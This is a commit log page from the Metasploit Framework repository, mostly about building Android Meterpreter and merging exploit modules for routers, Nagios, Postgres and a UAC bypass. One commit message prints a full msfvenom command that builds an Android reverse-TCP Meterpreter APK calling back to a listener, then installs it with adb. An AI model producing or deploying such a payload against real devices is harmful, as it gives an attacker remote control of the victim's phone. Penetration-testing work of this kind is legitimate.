Commit Graph

17781 Commits (fa241ab11ee703146f96657e8bf673bcdb9d35c4)

Author SHA1 Message Date
timwr fa241ab11e camera fixes and add wav header to audio record 2013-05-03 01:43:50 +01:00
timwr 2316c23f17 include javapayload in the dx build path 2013-05-02 16:17:56 +01:00
timwr ee67b6619e Merge pull request #4 from schierlm/android-fixes
Android Meterpreter bugfixes
2013-05-01 09:15:38 -07:00
Michael Schierl a13cf53b9f Android Meterpreter bugfixes
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
  whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
2013-05-01 18:01:37 +02:00
timwr a2f8b3dbec Merge pull request #3 from schierlm/android-deploy-profiles
Call dx from Maven profile
2013-05-01 08:18:31 -07:00
timwr 0836dd92f5 Merge pull request #2 from schierlm/android-scents
Animal-Sniffer-Plugin for Android
2013-05-01 08:00:13 -07:00
Michael Schierl 438529d860 Call dx from Maven profile
Convert the dx calls from build.sh to equivalent exec calls in Maven
deploy profile.

While this commit takes into account differences between Windows and *nix,
it was only tested on Windows, and the resulting binaries have not been
tested at all!

In addition, I was not able to pass individual .class file names to dx
without getting a "class name does not match path" error, so I changed it
to copy all required classes into a temp directory and call dx from there.

I also changed the cross-project paths to refer to the respective Maven
classpath, so in case you do an individual project build, the library
dependencies are taken from the Maven repository instead of taking them
from the target/ directory of the projects directly.
2013-04-27 22:20:18 +02:00
Michael Schierl af0691d205 Add animal-sniffer-plugin for Android API
Include the animal-scents for Android API in this commit, so that users
who do not have Android SDK can still check meterpreter API compatibility
with Android API. Some classes, like screenshot have been excluded since
they need AWT (but they are excluded in Android Meterpreter anyway).

To regenerate the scents file, run

mvn -Dandroid.sdk.path=... -P regenerate package
2013-04-27 20:40:55 +02:00
Michael Schierl 4abeb1b162 Use 1.4 version of net_config_get_interfaces
Apparently Android API 3 does not know the getMTU() function, which was
added in Java 1.6, and in Android API Level 9 (Gingerbread). Therefore,
fall back to the 1.4 version that does not need this API.
2013-04-27 20:39:13 +02:00
timwr 2c73323ceb make android build conditional on -Dandroid.sdk.path= 2013-04-27 00:21:13 +01:00
timwr 13d2d6edd2 Merge pull request #1 from jlee-r7/landing-1708-android-meterp
Add in-line signing
2013-04-26 02:14:42 -07:00
James Lee 6767eee08a Add in-line signing
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
timwr 0d0c728da4 fix obvious breakage 2013-04-18 10:24:50 +01:00
timwr df9c5f4a80 remove unused resources and fix whitespace 2013-04-13 16:22:52 +01:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
James Lee 15e2ceb749 Land #1660, dlink backdoor wordlist
[Closes #1660][See #1648]
2013-04-11 23:04:02 -05:00
Luke Imhoff 960392d614 Merge pull request #1725 from bturner-r7/mdm_from_rubygems
Use metasploit_data_models from rubygems
2013-04-11 13:51:08 -07:00
Brandon Turner 97f4882348 Use metasploit_data_models from rubygems 2013-04-11 15:35:19 -05:00
James Lee 8376531a32 Land #1217, java payload build system refactor
[Closes #1217]
2013-04-11 13:10:03 -05:00
James Lee 1d09d7e6e9 Java payload bins
Compiled with the shiny new maven system
2013-04-11 13:08:16 -05:00
jvazquez-r7 7e5d4bc893 Landing #1614, @jwpari nagios nrpe exploit 2013-04-11 17:53:52 +02:00
James Lee e3eef76372 Land #1223
This adds rc4-encrypting stagers for Windows.

[Closes #1223]
2013-04-10 12:14:52 -05:00
James Lee 6c980981db Break up long lines and add magic encoding comment 2013-04-10 09:28:45 -05:00
James Lee b3c78f74d2 Whitespace 2013-04-10 09:28:45 -05:00
Tod Beardsley 6a5d318749 Bumping version. 2013-04-10 08:59:56 -05:00
jvazquez-r7 a1605184ed Landing #1719, @m-1-k-3 dlink_diagnostic_exec_noauth exploit module 2013-04-10 11:17:29 +02:00
jvazquez-r7 4f2e3f0339 final cleanup for dlink_diagnostic_exec_noauth 2013-04-10 11:15:32 +02:00
m-1-k-3 8fbade4cbd OSVDB 2013-04-10 10:45:30 +02:00
Tod Beardsley 522642a65d Updating mailmap 2013-04-09 15:34:51 -05:00
Michael Schierl 263e967a6a Merge pull request #1 from todb-r7/pr1217-fix-gitignore-conflict
Pr1217 fix gitignore conflict
2013-04-09 10:04:18 -07:00
Tod Beardsley 2d09aa2a91 Landing #1709. 2013-04-09 10:55:21 -05:00
sinn3r 76d4538d2a Merge branch 'master' of github.com:rapid7/metasploit-framework 2013-04-09 10:24:54 -05:00
sinn3r 8de7b71303 Landing #1711, jhart-r7's improved check to detect unauth conn
For CVE-2013-1899 Postgres modules
2013-04-09 10:22:30 -05:00
sinn3r 1e258170dc It's a filename, so not trying to match any single char 2013-04-09 10:20:52 -05:00
sinn3r 50cf039170 Merge branch 'cve-2013-1899-not-auth' of github.com:jhart-r7/metasploit-framework into jhart-r7-cve-2013-1899-not-auth 2013-04-09 10:19:15 -05:00
Tod Beardsley 65e5ed8950 Merge #1716, version checker fix for UAC bypass 2013-04-09 09:00:30 -05:00
Tod Beardsley ba86e14d43 Whitespace and caps fixes 2013-04-09 08:57:53 -05:00
jvazquez-r7 157f25788b final cleanup for linksys_wrt54gl_apply_exec 2013-04-09 12:39:57 +02:00
jvazquez-r7 b090495ffb Landing pr #1703, m-1-k-3's linksys_wrt54gl_apply_exec exploit 2013-04-09 12:38:49 +02:00
m-1-k-3 b93ba58d79 EDB, BID 2013-04-09 11:56:53 +02:00
HD Moore e2b8d5ed23 Fix from David Kennedy, enable Windows 8 support 2013-04-09 02:07:40 -05:00
Tod Beardsley 95ff5c6ab7 Adding new .gitignores 2013-04-08 22:01:46 -05:00
Tod Beardsley b7ddedcb67 Replacing with master's .gitignore 2013-04-08 21:52:35 -05:00
Tod Beardsley f96126aeb7 Merging #1714, wireless interface fix
No redmine ticket. Note that landing this will shadow commit:a2d6f7b
but landing this empty commit anyway so @jlee-r7 's history gets back to
normal.
2013-04-08 20:23:14 -05:00
James Lee a2d6f7bb17 Landing #1714 - Don't bomb out if there are no wireless interfaces
No redmine ticket reported.
2013-04-08 17:17:47 -05:00
m-1-k-3 cbefc44a45 correct waiting 2013-04-08 21:40:50 +02:00
James Lee 14c1f58afb Don't bomb out if there are no wireless interfaces 2013-04-08 14:19:35 -05:00
jvazquez-r7 225342ce8f final cleanup for sysax_sshd_kexchange 2013-04-08 20:28:37 +02:00
jvazquez-r7 5bc454035c Merge remote-tracking branch 'origin/pr/1710' into landing-pr1710 2013-04-08 20:20:11 +02:00
Jon Hart b1152d1567 Improve Postgres CVE-2013-1899 to detect unauthorized connections 2013-04-08 09:55:23 -07:00